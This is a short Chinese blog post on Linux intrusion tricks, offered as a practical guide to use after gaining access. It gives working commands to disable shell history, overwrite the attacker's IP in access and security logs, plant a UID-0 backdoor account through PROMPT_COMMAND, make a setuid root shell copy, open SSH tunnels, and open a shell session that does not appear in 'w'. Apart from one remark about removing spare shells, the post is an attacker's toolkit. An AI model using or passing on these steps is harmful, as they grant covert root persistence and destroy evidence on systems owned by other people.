linux的入门渗透——几个常用参数的配置
<strong>1. 登录ssh之后不记录history</strong><br />
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
DDrk中就用到了一面的一条:<br />
unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE
<strong>2. sed增加登陆信息</strong><br />
替换登录日志
sed -s ‘s/202.101.172.35/192.168.1.1/g’ access_log access.log security
添加ssh限制登录的用户
sed -i ‘s/AllowUsers fuck root oracle/AllowUsers fuck root oracle rqcuser/g’ sshd_config
不过这个添加之后要强制重启sshd服务才可以生效
lsof -i:22 查找sshd的进程ID
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sshd 18662 root 11u IPv6 27925867 TCP *:ssh (LISTEN)
sshd 31793 sshd 12u IPv6 34742994 TCP 192.168.1.2:ssh->192.168.1.5:49080 (ESTABLISHED)
然后
kill -SIGHUP 18662
<strong>3.linux的BASH提权</strong><br />
export PROMPT_COMMAND=”/usr/sbin/useradd -o -u 0 hack &>/dev/null && echo hack:123456
/usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND”
<strong>4.ssh tunnel端口转发</strong><br />
ssh -C -f -N -g -L listen_portST_HostST_port user@Tunnel_Host
ssh -C -f -N -g -R listen_portST_HostST_port user@Tunnel_Host
ssh -C -f -N -g -D listen_port user@Tunnel_Host-f
<strong>5.本地rootshell</strong><br />
bash和tcsh是行不通的,其他的ash bsh zsh ksh均可。具体操作比较简单,大概说一下cp /bin/ksh . ; chown
root.root ksh; chmod 4755 ksh,然后执行ksh就可以获得root权限了;这一招虽然看似低级,但某些时候还是很
有用的。所以一般情况下把多余的shell删除可以在一定程度上 减少黑客的入侵。
<strong>6.让w查不到</strong><strong>登录信息</strong> <br />
用rootkit我就不废话了,这里有个小窍门,即使是普通用户登录管理员也不能看见:
ssh -T [email protected] /bin/bash -i
ssh -T 202.101.172.35 -p 8088 -l root /bin/bash -i
这里也不便设置别人的IP,就搞个浙江电信的DNS地址吧。
该命令其实是把远程的bash映射到本地。在ps命令里还是能看到下面的进程的
_ sshd: root@notty
_ /bin/bash -i
捐赠本站(Donate)
如您感觉文章有用,可扫码捐赠本站!(If the article useful, you can scan the QR code to donate))
- Author: shisekong
- Link: https://blog.361way.com/penetration/1083.html
- License: This work is under a 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议. Kindly fulfill the requirements of the aforementioned License when adapting or creating a derivative of this work.